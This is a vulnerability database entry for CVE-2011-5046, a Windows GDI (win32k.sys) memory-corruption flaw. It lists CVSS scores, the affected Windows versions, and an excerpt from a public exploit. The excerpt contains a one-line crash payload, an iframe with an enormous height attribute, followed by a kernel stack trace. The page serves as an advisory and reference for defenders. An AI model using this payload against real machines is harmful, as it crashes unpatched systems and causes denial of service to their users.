9.3
CVSSv2

CVE-2011-5046

Published: 30/12/2011 Updated: 26/02/2019
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

The Graphics Device Interface (GDI) in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows remote malicious users to execute arbitrary code or cause a denial of service (memory corruption) via crafted data, as demonstrated by a large height attribute of an IFRAME element rendered by Safari, aka "GDI Access Violation Vulnerability."

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft windows server 2008

microsoft windows server 2008 r2

microsoft windows 7

microsoft windows server 2003

microsoft windows vista

microsoft windows xp

Exploits

# Exploit Title: GdiDrawStream BSoD # Date: 18-12-2011 # Author: webDEViL # Version: Latest # Tested on: Windows 7 x64 using Safari # twittercom/w3bd3vil <iframe height='18082563'></iframe> ---#--- STACK_TEXT: fffff880`08b50f78 fffff800`0328e3bf : 00000000`00000050 fffff904`c2730258 00000000`00000001 fffff880`08b510e0 : nt!Ke ...